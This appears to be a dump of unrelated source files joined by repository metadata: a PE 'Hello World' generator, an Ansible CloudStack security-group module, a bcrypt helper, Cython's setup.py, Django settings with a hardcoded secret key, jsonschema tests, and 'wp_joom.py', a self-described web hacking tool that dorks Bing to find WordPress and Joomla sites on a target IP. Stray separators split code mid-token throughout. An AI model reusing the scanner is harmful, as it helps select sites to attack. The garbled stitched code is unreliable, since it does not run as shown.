# Fixed PE headers: DOS header, NT headers, optional header, data dirs.
f.write("""; PE file with a maximum of sections
%include '..\..\consts.asm'
FILEALIGN equ 200h
SECTIONALIGN equ 1000h
org IMAGEBASE
istruc IMAGE_DOS_HEADER
at IMAGE_DOS_HEADER.e_magic, db 'MZ'
at IMAGE_DOS_HEADER.e_lfanew, dd nt_header - IMAGEBASE
iend
nt_header:
istruc IMAGE_NT_HEADERS
at IMAGE_NT_HEADERS.Signature, db 'PE',0,0
iend
istruc IMAGE_FILE_HEADER
at IMAGE_FILE_HEADER.Machine, dw IMAGE_FILE_MACHINE_I386
at IMAGE_FILE_HEADER.NumberOfSections, dw NUMBEROFSECTIONS
at IMAGE_FILE_HEADER.SizeOfOptionalHeader, dw SIZEOFOPTIONALHEADER
at IMAGE_FILE_HEADER.Characteristics, dw CHARACTERISTICS
iend
OptionalHeader:
istruc IMAGE_OPTIONAL_HEADER32
at IMAGE_OPTIONAL_HEADER32.Magic, dw IMAGE_NT_OPTIONAL_HDR32_MAGIC
at IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint, dd EntryPoint - IMAGEBASE
at IMAGE_OPTIONAL_HEADER32.ImageBase, dd IMAGEBASE
at IMAGE_OPTIONAL_HEADER32.SectionAlignment, dd SECTIONALIGN
at IMAGE_OPTIONAL_HEADER32.FileAlignment, dd FILEALIGN
at IMAGE_OPTIONAL_HEADER32.MajorSubsystemVersion, dw 4
at IMAGE_OPTIONAL_HEADER32.SizeOfImage, dd SIZEOFIMAGE
at IMAGE_OPTIONAL_HEADER32.SizeOfHeaders, dd SIZEOFHEADERS ; can be 0 in some circumstances
at IMAGE_OPTIONAL_HEADER32.Subsystem, dw IMAGE_SUBSYSTEM_WINDOWS_GUI
at IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes, dd NUMBEROFRVAANDSIZES
iend
DataDirectory:
istruc IMAGE_DATA_DIRECTORY2
at ExportsVA, dd Exports_Directory - IMAGEBASE
at ImportsVA, dd IMPORT_DESCRIPTOR - IMAGEBASE
iend
NUMBEROFRVAANDSIZES equ ($ - DataDirectory) / IMAGE_DATA_DIRECTORY_size
SIZEOFOPTIONALHEADER equ $ - OptionalHeader
SectionHeader:
""")

# One section header per section; each raw section is 0x200 bytes on disk.
for i in xrange(SEC_NUMB):
    f.write("""istruc IMAGE_SECTION_HEADER
at IMAGE_SECTION_HEADER.Name, db ".sec%(counter)02X",0
at IMAGE_SECTION_HEADER.VirtualSize, dd SECTION%(counter)iVSIZE
at IMAGE_SECTION_HEADER.VirtualAddress, dd Section%(counter)iStart - IMAGEBASE
at IMAGE_SECTION_HEADER.SizeOfRawData, dd SECTION%(counter)iSIZE
at IMAGE_SECTION_HEADER.PointerToRawData, dd %(pstart)08xh
at IMAGE_SECTION_HEADER.Characteristics, dd IMAGE_SCN_MEM_EXECUTE ; necessary under Win7 (with DEP?)
iend
""" % {"counter": i, "pstart": (i * 0x200 + SECTIONS_VSTART)})

f.write(
"""
NUMBEROFSECTIONS equ ($ - SectionHeader) / IMAGE_SECTION_HEADER_size
align 400h, db 0
bits 32
EntryPoint equ 0c8000h + IMAGEBASE
""")

# Section 0 carries the actual code: MessageBoxA + ExitProcess.
# (Artifact repaired: the 'tada' db line had a stray separator.)
f.write("""
SECTION .0 align=200h valign=1000h
Section0PStart equ 0%(SECTIONS_VSTART)08Xh
SIZEOFHEADERS equ $ - IMAGEBASE
Section0Start:
push MB_ICONINFORMATION ; UINT uType
push tada ; LPCTSTR lpCaption
push helloworld ; LPCTSTR lpText
push 0 ; HWND hWnd
call MessageBoxA
push 0 ; UINT uExitCode
call ExitProcess
tada db "Tada!", 0
helloworld db "Hello World!", 0
;%%IMPORT user32.dll!MessageBoxA
;%%IMPORT kernel32.dll!ExitProcess
;%%IMPORTS
SECTION0VSIZE equ $ - Section0Start
end_:
align 200h, db 0
SECTION0SIZE equ $ - Section0Start
""" % locals())

# Remaining sections: each 1000h virtual bytes, 200h raw, jumping backwards.
# (Artifact repaired: the Section label format string had a stray separator.)
for i in xrange(SEC_NUMB - 1):
    f.write("""Section%(counter)iStart equ %(RVA)i + IMAGEBASE
SECTION%(counter)iSIZE equ 0200h
SECTION%(counter)iVSIZE equ 1000h
jmp $ - 01000h
db 0h
align 200h, db 0
""" % {"counter": i + 1, "RVA": (i + 3) * 0x1000})

f.write("""
SIZEOFIMAGE equ %(sizeofimage)08Xh
;Ange Albertini, BSD Licence, 2011
""" % {"sizeofimage": SECTIONS_VSTART + SEC_NUMB * 0x1000})

f.close()
|
tsdmgz/ansible | lib/ansible/modules/cloud/cloudstack/cs_securitygroup_rule.py | Python | gpl-3.0 | 12,777 | 0.00227 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, René Moser <mail@renemoser.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_securitygroup_rule
short_description: Manages security group rules on Apache CloudStack based clouds.
description:
- Add and remove security group rules.
version_added: '2.0'
author: "René Moser (@resmo)"
options:
security_group:
description:
- Name of the security group the rule is related to. The security group must be existing.
required: true
state:
description:
- State of the security group rule.
default: present
choices: [ present, absent ]
protocol:
description:
- Protocol of the security group rule.
default: tcp
choices: [ tcp, udp, icmp, ah, esp, gre ]
type:
description:
- Ingress or egress security group rule.
default: ingress
choices: [ ingress, egress ]
cidr:
description:
- CIDR (full notation) to be used for security group rule.
default: '0.0.0.0/0'
user_security_group:
description:
- Security group this rule is based of.
start_port:
description:
- Start port for this rule. Required if C(protocol=tcp) or C(protocol=udp).
aliases: [ port ]
end_port:
description:
- End port for this rule. Required if C(protocol=tcp) or C(protocol=udp), but C(start_port) will be used if not set.
icmp_type:
description:
- Type of the icmp message being sent. Required if C(protocol=icmp).
icmp_code:
description:
- Error code for this icmp message. Required if C(protocol=icmp).
project:
description:
- Name of the project the security group to be created in.
poll_async:
description:
- Poll async jobs until job has finished.
default: true
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
---
- name: allow inbound port 80/tcp from 1.2.3.4 added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
port: 80
cidr: 1.2.3.4/32
- name: allow tcp/udp outbound added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
type: egress
start_port: 1
end_port: 65535
protocol: '{{ item }}'
with_items:
- tcp
- udp
- name: allow inbound icmp from 0.0.0.0/0 added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
protocol: icmp
icmp_code: -1
icmp_type: -1
- name: remove rule inbound port 80/tcp from 0.0.0.0/0 from security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
port: 80
state: absent
- name: allow inbound port 80/tcp from security group web added to security group 'default'
local_action:
module: cs_securitygroup_rule
security_group: default
port: 80
user_security_group: web
'''
RETURN = '''
---
id:
description: UUID of the of the rule.
returned: success
type: string
sample: a6f7a5fc-43f8-11e5-a151-feff819cdc9f
security_group:
description: security group of the rule.
returned: success
type: string
sample: default
type:
description: type of the rule.
returned: success
type: string
sample: ingress
cidr:
description: CIDR of the rule.
returned: success and cidr is defined
type: string
sample: 0.0.0.0/0
user_security_group:
description: user security group of the rule.
returned: success and user_security_group is defined
type: string
sample: default
protocol:
description: protocol of the rule.
returned: success
type: string
sample: tcp
start_port:
description: start port of the rule.
returned: success
type: int
sample: 80
end_port:
description: end port of the rule.
returned: success
type: int
sample: 80
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import AnsibleCloudStack, cs_argument_spec, cs_required_together
class AnsibleCloudStackSecurityGroupRule(AnsibleCloudStack):
    def __init__(self, module):
        super(AnsibleCloudStackSecurityGroupRule, self).__init__(module)
        # Map CloudStack API result keys to the names exposed in the
        # module's RETURN facts.
        self.returns = {
            'icmptype': 'icmp_type',
            'icmpcode': 'icmp_code',
            'endport': 'end_port',
            'startport': 'start_port',
            'protocol': 'protocol',
            'cidr': 'cidr',
            'securitygroupname': 'user_security_group',
        }
def _tcp_udp_match(self, rule, protocol, start_port, end_port):
return (protocol in ['tcp', 'udp'] and
protocol == rule['protocol'] and
start_port == int(rule['startport']) and
end_port == int(rule['endport']))
def _icmp_match(self, rule, protocol, icmp_code, icmp_type):
return (protocol == 'icmp' and
protocol == rule['protocol'] and
icmp_code == int(rule['icmpcode']) and
icmp_type == int(rule['icmptype']))
def _ah_esp_gre_match(self, rule, protocol):
return (protocol in ['ah', 'esp', 'gre'] and
protocol == rule['protocol'])
    def _type_security_group_match(self, rule, security_group_name):
        # True when a user security group was requested and the rule
        # references that group by name.  The `and` chain short-circuits,
        # so a falsy name is returned as-is; callers only use the result
        # as a boolean.
        return (security_group_name and
                'securitygroupname' in rule and
                security_group_name == rule['securitygroupname'])
def _type_cidr_match(self, rule, cidr):
return ('cidr' in rule and
| cidr == rule['cidr'])
def _get_rule(self, rules):
user_security_group_name = self.module.params.get('user_security_group')
cidr = self.module.params.get('cidr')
protocol = self.module.params.get('protocol')
start_port = self.module.params.get('start_port')
end_port = self.get_or_fallback('end_port', | 'start_port')
icmp_code = self.module.params.get('icmp_code')
icmp_type = self.module.params.get('icmp_type')
if protocol in ['tcp', 'udp'] and (start_port is None or end_port is None):
self.module.fail_json(msg="no start_port or end_port set for protocol '%s'" % protocol)
if protocol == 'icmp' and (icmp_type is None or icmp_code is None):
self.module.fail_json(msg="no icmp_type or icmp_code set for protocol '%s'" % protocol)
for rule in rules:
if user_security_group_name:
type_match = self._type_security_group_match(rule, user_security_group_name)
else:
type_match = self._type_cidr_match(rule, cidr)
protocol_match = (self._tcp_udp_match(rule, protocol, start_port, end_port) or
self._icmp_match(rule, protocol, icmp_code, icmp_type) or
self._ah_esp_gre_match(rule, protocol))
if type_match and protocol_match:
return rule
return None
def get_security_group(self, security_group_name=None):
if not security_group_name:
security_group_name = self.module.params.get('security_group')
args = {
'securitygroupname': security_group_name,
'projectid': self.get_project('id'),
}
sgs = self.query_api('listSecurityGroups', **args)
if not sgs or 'securitygroup' not in sgs:
self.module.fail_json(msg="security group '%s' not found" % security_group_name)
return sgs['securitygroup'][0]
def add_rule(self):
security_group = self.get_security_group()
args = {}
user_security_group_name = self.module.params.get('user_security_group')
# the user_security_group and cidr are mutually_exclusive, but cidr is defaulted to 0.0.0.0/0.
# that is why we ignore if we have a user_security_group.
if user_security_group_name:
args['usersecuritygrouplist'] = []
user_s |
lordnotfound404/404web | wp_joom.py | Python | gpl-2.0 | 4,272 | 0.034176 | import urllib
import os
import re
from time import sleep
from datetime import date
def welcome(modulename):
    """Print the tool's ASCII banner followed by the given module name."""
    print """
    |==========================================================|
    |====================== [ 404 ] ========================|
    |==============[ lordnotfound404@gmail.com ]===============|
    |==========[ https://www.facebook.com/404andreas]==========|
    |==========================================================|
    | **** Web Hacking framwork by 404 *** |
    |==========================================================|
    """
    print '####### ' + modulename
###########################################################
def serverTargeting(IP):
welcome("perform many dork based scans")
#fil = open(logsfilename+'.txt','a')
#fil.write("[Info] : new target "+now.strftime("%A %d %b %Y")+"IP adress : "+IP)
#print "[Info] : new target "+now.strftime("%A %d %b %Y")+"IP adress : "+IP
#fil.write("[Info] : getting links from Bing")
print " New TARGET " + IP
print "[Info] : getting Hosted domains from Bing"
file2 =open(IP+'hosted.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
print "[Info] : links list saved in file "+IP+"hosted.txt"
print "[Info] : getting wordpress sites from server ...."
file2 =open(IP+'wp_Powred.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP + " /wp-content/"
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('h | ttp://www.bing.com/search?q=ip%3A41.203 | .11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
#getsitesbing("IP:"+IP+" /wp-content/" , 'wp_Powred' )
print "[Info] : links list saved in file "+IP+"wp_Powred.txt"
print "[Info] : getting joomla sites from server ...."
file2 =open(IP+'joom_Powred.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP +" index.php?option=com_content"
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
#getsitesbing("IP:"+IP+" index.php?option=com_content" , 'joom_Powred' )
print "[Info] : links saved in file "+IP+"joom_Powred.txt"
print " ALL is done good luck dude !!!!! "
###########################################################
# Script entry point: show the banner, prompt for a target IP (Python 2
# raw_input returns a str), then launch the scans against it.
welcome("Joomla and wordpress Sites Finder")
IPadress=raw_input("[INFO] : enter IP adress : ")
serverTargeting(IPadress)
|
fdemian/Morpheus | api/Crypto.py | Python | bsd-2-clause | 288 | 0 | im | port bcrypt
def hash_password(password):
    """Return *password* hashed with a freshly generated bcrypt salt (cost factor 14)."""
    salt = bcrypt.gensalt(14)
    return bcrypt.hashpw(password, salt)
def check_password(password, hashed):
    """Return True when *password* matches the bcrypt digest *hashed*.

    Uses bcrypt.checkpw, which performs a constant-time comparison.
    (The source line was garbled by an extraction artifact splitting the
    'password' parameter name; reconstructed here.)
    """
    return bcrypt.checkpw(password, hashed)
|
bzzzz/cython | setup.py | Python | apache-2.0 | 12,175 | 0.005092 | from distutils.core import setup, Extension
fro | m distutils.sysconfig import get_python_lib
import os, os.path
import sys
if 'sdist' in sys.argv and sys.platform != "win32":
assert os.system("git show-ref -s HEAD > .gitrev") == 0
if sys.platform == "darwin":
# Don't create resource files on OS X tar.
os.environ['COPY_EXTENDED_ATTRIBUTES_DISABLE'] = 'true'
os.environ['COPYFILE_DISABLE'] = 'true'
setup_args = {}
def add_command_class(name, cls):
    """Register a distutils command class under *name* in setup_args['cmdclass']."""
    setup_args.setdefault('cmdclass', {})[name] = cls
if sys.version_info[0] >= 3:
import lib2to3.refactor
from distutils.command.build_py \
import build_py_2to3 as build_py
# need to convert sources to Py3 on installation
fixers = [ fix for fix in lib2to3.refactor.get_fixers_from_package("lib2to3.fixes")
if fix.split('fix_')[-1] not in ('next',)
]
build_py.fixer_names = fixers
add_command_class("build_py", build_py)
pxd_include_dirs = [
directory for directory, dirs, files in os.walk('Cython/Includes')
if '__init__.pyx' in files or '__init__.pxd' in files
or directory == 'Cython/Includes' or directory == 'Cython/Includes/Deprecated']
pxd_include_patterns = [
p+'/*.pxd' for p in pxd_include_dirs ] + [
p+'/*.pyx' for p in pxd_include_dirs ]
if sys.version_info < (2,4):
install_base_dir = get_python_lib(prefix='')
import glob
patterns = pxd_include_patterns + [
'Cython/Plex/*.pxd',
'Cython/Compiler/*.pxd',
'Cython/Runtime/*.pyx'
]
setup_args['data_files'] = [
(os.path.dirname(os.path.join(install_base_dir, pattern)),
[ f for f in glob.glob(pattern) ])
for pattern in patterns
]
else:
setup_args['package_data'] = {
'Cython.Plex' : ['*.pxd'],
'Cython.Compiler' : ['*.pxd'],
'Cython.Runtime' : ['*.pyx', '*.pxd'],
'Cython' : [ p[7:] for p in pxd_include_patterns ],
}
# This dict is used for passing extra arguments that are setuptools
# specific to setup
setuptools_extra_args = {}
# tells whether to include cygdb (the script and the Cython.Debugger package
include_debugger = sys.version_info[:2] > (2, 5)
if 'setuptools' in sys.modules:
setuptools_extra_args['zip_safe'] = False
setuptools_extra_args['entry_points'] = {
'console_scripts': [
'cython = Cython.Compiler.Main:setuptools_main',
]
}
scripts = []
else:
if os.name == "posix":
scripts = ["bin/cython"]
if include_debugger:
scripts.append('bin/cygdb')
else:
scripts = ["cython.py"]
if include_debugger:
scripts.append('cygdb.py')
def compile_cython_modules(profile=False, compile_more=False, cython_with_refnanny=False):
source_root = os.path.abspath(os.path.dirname(__file__))
compiled_modules = ["Cython.Plex.Scanners",
"Cython.Plex.Actions",
"Cython.Compiler.Lexicon",
"Cython.Compiler.Scanning",
"Cython.Compiler.Parsing",
"Cython.Compiler.Visitor",
"Cython.Compiler.Code",
"Cython.Runtime.refnanny",]
if compile_more:
compiled_modules.extend([
"Cython.Compiler.ParseTreeTransforms",
"Cython.Compiler.Nodes",
"Cython.Compiler.ExprNodes",
"Cython.Compiler.ModuleNode",
"Cython.Compiler.Optimize",
])
defines = []
if cython_with_refnanny:
defines.append(('CYTHON_REFNANNY', '1'))
extensions = []
if sys.version_info[0] >= 3:
from Cython.Distutils import build_ext as build_ext_orig
for module in compiled_modules:
source_file = os.path.join(source_root, *module.split('.'))
if os.path.exists(source_file + ".py"):
pyx_source_file = source_file + ".py"
else:
pyx_source_file = source_file + ".pyx"
dep_files = []
if os.path.exists(source_file + '.pxd'):
dep_files.append(source_file + '.pxd')
if '.refnanny' in module:
defines_for_module = []
else:
defines_for_module = defines
extensions.append(
Extension(module, sources = [pyx_source_file],
define_macros = defines_for_module,
depends = dep_files)
)
class build_ext(build_ext_orig):
# we must keep the original modules alive to make sure
# their code keeps working when we remove them from
# sys.modules
dead_modules = []
def build_extensions(self):
# add path where 2to3 installed the transformed sources
# and make sure Python (re-)imports them from there
already_imported = [ module for module in sys.modules
if module == 'Cython' or module.startswith('Cython.') ]
keep_alive = self.dead_modules.append
for module in already_imported:
keep_alive(sys.modules[module])
del sys.modules[module]
sys.path.insert(0, os.path.join(source_root, self.build_lib))
if profile:
from Cython.Compiler.Options import directive_defaults
directive_defaults['profile'] = True
print("Enabled profiling for the Cython binary modules")
build_ext_orig.build_extensions(self)
setup_args['ext_modules'] = extensions
add_command_class("build_ext", build_ext)
else: # Python 2.x
from distutils.command.build_ext import build_ext as build_ext_orig
try:
class build_ext(build_ext_orig):
def build_extension(self, ext, *args, **kargs):
try:
build_ext_orig.build_extension(self, ext, *args, **kargs)
except StandardError:
print("Compilation of '%s' failed" % ext.sources[0])
from Cython.Compiler.Main import compile
from Cython import Utils
if profile:
from Cython.Compiler.Options import directive_defaults
directive_defaults['profile'] = True
print("Enabled profiling for the Cython binary modules")
source_root = os.path.dirname(__file__)
for module in compiled_modules:
source_file = os.path.join(source_root, *module.split('.'))
if os.path.exists(source_file + ".py"):
pyx_source_file = source_file + ".py"
else:
pyx_source_file = source_file + ".pyx"
c_source_file = source_file + ".c"
source_is_newer = False
if not os.path.exists(c_source_file):
source_is_newer = True
else:
c_last_modified = Utils.modification_time(c_source_file)
if Utils.file_newer_than(pyx_source_file, c_last_modified):
source_is_newer = True
else:
pxd_source_file = source_file + ".pxd"
if os.path.exists(pxd_source_file) and Utils.file_newer_than(pxd_source_file, c_last_modified):
source_is_newer = True
if source_is_newer:
print("Compiling module %s ..." % module)
result = compile(pyx_source_file)
c_source_file = result.c_file
if c_source_file:
# Py2 distutils can't handle unicode file paths
if isinstance(c_source_file, unicode):
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding |
Egregors/django-autoslug-field | testautoslug/settings.py | Python | mit | 3,357 | 0.002085 | # Django settings for testautoslug project.
import os
PROJECT_ROOT = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_ROOT, 'dev.db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '44mxeh8nkm^ycwef-eznwgk&8_lwc!j9r)h3y_^ypz1iom18pa'
# List of callables that kno | w how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.cont | rib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'testautoslug.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'testapp',
)
|
wikimedia/operations-debs-python-jsonschema | tests.py | Python | mit | 27,331 | 0.003439 | from __future__ import unicode_literals
from decimal import Decimal
import contextlib
import glob
import io
import json
import os
import re
import subprocess
import sys
if sys.version_info[:2] < (2, 7): # pragma: no cover
import unittest2 as unittest
else:
import unittest
try:
from unittest import mock
except ImportError:
import mock
try:
from sys import pypy_version_info
except ImportError:
pypy_version_info = None
from jsonschema import (
PY3, FormatError, SchemaError, UnknownType, ValidationError, ErrorTree,
Draft3Validator, Draft4Validator, FormatChecker, RefResolver,
ValidatorMixin, draft3_format_checker, draft4_format_checker, validate,
)
THIS_DIR = os.path.dirname(__file__)
TESTS_DIR = os.path.join(THIS_DIR, "json", "tests" | )
JSONSCHEMA_SUITE = os.path.join(THIS_DIR, "json", "bin", "jsonschema_suite")
REMOTES = subprocess.Popen(
["py | thon", JSONSCHEMA_SUITE, "remotes"], stdout=subprocess.PIPE,
).stdout
if PY3:
REMOTES = io.TextIOWrapper(REMOTES)
REMOTES = json.load(REMOTES)
def make_case(schema, data, valid):
    """Build an unbound test method checking *data* against *schema*.

    The generated method validates with the test class' validator_class
    (plus optional validator_kwargs). For cases flagged invalid, it asserts
    that ValidationError is raised instead.
    """
    def test_case(self):
        extra = getattr(self, "validator_kwargs", {})
        if valid:
            validate(data, schema, cls=self.validator_class, **extra)
        else:
            with self.assertRaises(ValidationError):
                validate(data, schema, cls=self.validator_class, **extra)
    return test_case
def load_json_cases(tests_glob, ignore_glob="", basedir=TESTS_DIR, skip=None):
    """Class decorator that attaches one test_* method per case found in the
    official JSON-Schema test suite.

    :param tests_glob: glob (relative to *basedir*) selecting suite files
    :param ignore_glob: optional glob of suite files to exclude
    :param basedir: directory containing the suite files
    :param skip: optional predicate on a case dict; matching cases are
        wrapped in unittest.skip
    """
    if ignore_glob:
        ignore_glob = os.path.join(basedir, ignore_glob)
    def add_test_methods(test_class):
        ignored = set(glob.iglob(ignore_glob))
        for filename in glob.iglob(os.path.join(basedir, tests_glob)):
            if filename in ignored:
                continue
            # e.g. "draft3/type.json" -> "type", embedded in the method name
            validating, _ = os.path.splitext(os.path.basename(filename))
            with open(filename) as test_file:
                data = json.load(test_file)
            for case in data:
                for test in case["tests"]:
                    a_test = make_case(
                        case["schema"],
                        test["data"],
                        test["valid"],
                    )
                    # collapse non-identifier characters so the description
                    # yields a valid Python method name
                    test_name = "test_%s_%s" % (
                        validating,
                        re.sub(r"[\W ]+", "_", test["description"]),
                    )
                    if not PY3:
                        # method names must be byte strings on Python 2
                        test_name = test_name.encode("utf-8")
                    a_test.__name__ = test_name
                    if skip is not None and skip(case):
                        a_test = unittest.skip("Checker not present.")(
                            a_test
                        )
                    setattr(test_class, test_name, a_test)
        return test_class
    return add_test_methods
class TypesMixin(object):
    """Mixin checking Python-2-specific type handling of the validators."""
    # On Python 2 a bytestring must count as a "string"; Python 3 json
    # always produces unicode, so the case is skipped there.
    @unittest.skipIf(PY3, "In Python 3 json.load always produces unicode")
    def test_string_a_bytestring_is_a_string(self):
        self.validator_class({"type" : "string"}).validate(b"foo")
class DecimalMixin(object):
    """Mixin verifying that Decimal instances validate as "number" once the
    validator's type map is extended to include them."""
    def test_it_can_validate_with_decimals(self):
        validator = self.validator_class(
            {"type" : "number"}, types={"number" : (int, float, Decimal)}
        )
        for ok in (1, 1.1, Decimal(1) / Decimal(8)):
            validator.validate(ok)
        for bad in ("foo", {}, [], True, None):
            with self.assertRaises(ValidationError):
                validator.validate(bad)
def missing_format(checker):
    """Return a skip-predicate for suite cases whose "format" the given
    FormatChecker cannot validate (with a date-time workaround for old PyPy).
    """
    def missing_format(case):
        format = case["schema"].get("format")
        return format not in checker.checkers or (
            # datetime.datetime is overzealous about typechecking in <=1.9
            format == "date-time" and
            pypy_version_info is not None and
            pypy_version_info[:2] <= (1, 9)
        )
    return missing_format
class FormatMixin(object):
    """Mixin exercising "format" keyword handling for both draft validators."""
    def test_it_returns_true_for_formats_it_does_not_know_about(self):
        # unknown formats are ignored, not rejected
        validator = self.validator_class(
            {"format" : "carrot"}, format_checker=FormatChecker(),
        )
        validator.validate("bugs")
    def test_it_does_not_validate_formats_by_default(self):
        # no format_checker unless one is passed in explicitly
        validator = self.validator_class({})
        self.assertIsNone(validator.format_checker)
    def test_it_validates_formats_if_a_checker_is_provided(self):
        checker = mock.Mock(spec=FormatChecker)
        validator = self.validator_class(
            {"format" : "foo"}, format_checker=checker,
        )
        validator.validate("bar")
        checker.check.assert_called_once_with("bar", "foo")
        cause = ValueError()
        checker.check.side_effect = FormatError('aoeu', cause=cause)
        with self.assertRaises(ValidationError) as cm:
            validator.validate("bar")
        # Make sure original cause is attached
        self.assertIs(cm.exception.cause, cause)
@load_json_cases(
"draft3/*.json", ignore_glob=os.path.join("draft3", "refRemote.json")
)
@load_json_cases(
"draft3/optional/format.json", skip=missing_format(draft3_format_checker)
)
@load_json_cases("draft3/optional/bignum.json")
@load_json_cases("draft3/optional/zeroTerminatedFloats.json")
class TestDraft3(
unittest.TestCase, TypesMixin, DecimalMixin, FormatMixin
):
validator_class = Draft3Validator
validator_kwargs = {"format_checker" : draft3_format_checker}
def test_any_type_is_valid_for_type_any(self):
validator = self.validator_class({"type" : "any"})
validator.validate(mock.Mock())
# TODO: we're in need of more meta schema tests
def test_invalid_properties(self):
with self.assertRaises(SchemaError):
validate({}, {"properties": {"test": True}},
cls=self.validator_class)
def test_minItems_invalid_string(self):
with self.assertRaises(SchemaError):
# needs to be an integer
validate([1], {"minItems" : "1"}, cls=self.validator_class)
@load_json_cases(
"draft4/*.json", ignore_glob=os.path.join("draft4", "refRemote.json")
)
@load_json_cases(
"draft4/optional/format.json", skip=missing_format(draft4_format_checker)
)
@load_json_cases("draft4/optional/bignum.json")
@load_json_cases("draft4/optional/zeroTerminatedFloats.json")
class TestDraft4(
unittest.TestCase, TypesMixin, DecimalMixin, FormatMixin
):
validator_class = Draft4Validator
validator_kwargs = {"format_checker" : draft4_format_checker}
# TODO: we're in need of more meta schema tests
def test_invalid_properties(self):
with self.assertRaises(SchemaError):
validate({}, {"properties": {"test": True}},
cls=self.validator_class)
def test_minItems_invalid_string(self):
with self.assertRaises(SchemaError):
# needs to be an integer
validate([1], {"minItems" : "1"}, cls=self.validator_class)
class RemoteRefResolution(unittest.TestCase):
def setUp(self):
patch = mock.patch("jsonschema.requests")
requests = patch.start()
requests.get.side_effect = self.resolve
self.addCleanup(patch.stop)
def resolve(self, reference):
_, _, reference = reference.partition("http://localhost:1234/")
return mock.Mock(**{"json.return_value" : REMOTES.get(reference)})
@load_json_cases("draft3/refRemote.json")
